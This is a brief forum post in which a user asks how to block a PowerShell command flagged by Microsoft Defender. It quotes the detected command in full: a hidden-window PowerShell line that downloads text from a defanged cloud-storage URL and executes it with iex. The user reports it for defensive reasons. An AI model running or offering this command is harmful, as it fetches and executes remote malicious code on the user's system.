Block powershell.exe command line

hello, Community Recenttly, on Microsoft Defender recived the follow message as Executed powershell.exe command line ‘"PowerShell.exe" -W Hidden -command $url = 'https[:]//zip-store[.]oss-ap-southeast-1[.]aliyuncs[.]com/updated%20file/para[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text’.The URL involved is ‘'https[:]//zip-store[.]oss-ap-southeast-1[.]aliyuncs[.]com/updated%20file/para[.]txt' and it is highly malicious. and need a way to block the powershell commands.
